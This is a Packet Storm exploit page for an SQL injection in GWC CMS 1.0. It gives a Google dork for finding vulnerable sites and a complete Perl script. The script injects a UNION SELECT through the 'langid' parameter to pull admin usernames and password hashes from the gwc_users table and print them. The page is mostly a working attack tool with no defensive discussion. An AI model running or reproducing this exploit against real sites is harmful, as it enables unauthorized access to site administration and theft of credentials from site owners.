exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

GWC CMS 1.0 SQL Injection

GWC CMS 1.0 SQL Injection
Posted Jul 8, 2015
Authored by nopesled

GWX CMS version 1.0 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
SHA-256 | ab170d9faf15a5aca1ea6bcd67d7687b8f76d131b4a7ca84ccb061dc8baa6277

GWC CMS 1.0 SQL Injection

Change Mirror Download
# Exploit Title: GWC CMS SQL Injection Vulnerability
# Exploit Author: nopesled
# Google Dork: "inurl:?langid=1 inurl:topmenuid="
# Date: 08/07/2015
# Version: 1.0
# Tested on: Linux
#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request::Common qw(GET);

print " == Exploit by nopesled == \n";
if (@ARGV < 1){
die "Invalid amount of arguments\nExample: perl $0 http://site.com\n";
}
$site = shift;
$ua = LWP::UserAgent->new;
$payload = "$site/?langid=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,group_concat(0x3c62723e,userlogin,0x3a,userpasswd) from gwc_users--";
print "[+] Grabbing Admin login [+]\n";
$request = GET $payload;
$response = $ua->request($request);
if ($response->is_success){
if ($response->content =~ /(.+[0-9a-f]{32})/){
print "[+] Admin info obtained [+]\n\n$1\n";
exit;
}
else {
die "[+] Admin info not found [+]";
}
}
else {
die "[+] Request failed [+]";
}
exit;

=pod

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Signed.
-----BEGIN PGP SIGNATURE-----
Version: Keybase OpenPGP v2.0.20
Comment: https://keybase.io/crypto

wsBcBAABCgAGBQJVnUB5AAoJEOB0UMODnV4UWD0IAIPzPvMFsJOGhlv1HF1Nb1Xg
g9fWZ8FWBV0/+hUuEBQX0TmcEgugssdG+ce4qhYthnqgKa9PgM/oViDUn4eEK32c
/yyOgQ+uY4wMIZaV4LykLx3i9Dwh1kF+MuphLwHhPmuZMBu2sQNELJjdTtWJ6+cW
Ue9g1eF1Af+Hn2LY+LBSwb9XbLYSqFkUAYSon/NCQgC7YWA+t7+B434zkgXBwZDe
/ppTysv6nSI0EVap0u4dh7qafztQsFK2DF2f/cnU6JtYpOPvgbuoa/kHQ9yAVAr6
6LbNVN3uKXUd63ZlJvRAHao7mvrVzIojzstRiX8oOHl0u99NMHJukUEX7UhWXAM=
=TMgD
-----END PGP SIGNATURE-----

=cut
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    0 Files
  • 6
    Sep 6th
    0 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    0 Files
  • 9
    Sep 9th
    0 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close